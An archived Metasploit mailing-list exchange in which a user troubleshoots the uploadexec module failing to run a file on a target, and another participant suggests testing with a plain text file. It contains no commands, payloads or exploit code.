Metasploit mailing list archives

Re: Problems executing file on target using uploadexec

From: la zariguella <lazariguella () gmail com>
Date: Tue, 19 Feb 2013 22:55:48 -0300

Hi Robin, thanks for your answer!

I test uploading a text file, same error. And file on target was untuched.

I will make more tests here to see what can be happening ...

Thanks for your help guys!

2013/2/19 Robin Wood <robin () digininja org>

On 20 February 2013 01:36, la zariguella <lazariguella () gmail com> wrote:

Well , same error disabling antivirus, and for double check, same error
after uninstalling antivirus and reboot target. (Running as admin user on
target)

Maybe you cant point me to the right documentation, to understand better
how can i solve this issue.

Thanks!

Have you tried uploading a simple text file just in case something else is
picking the exe up and affecting it?

Robin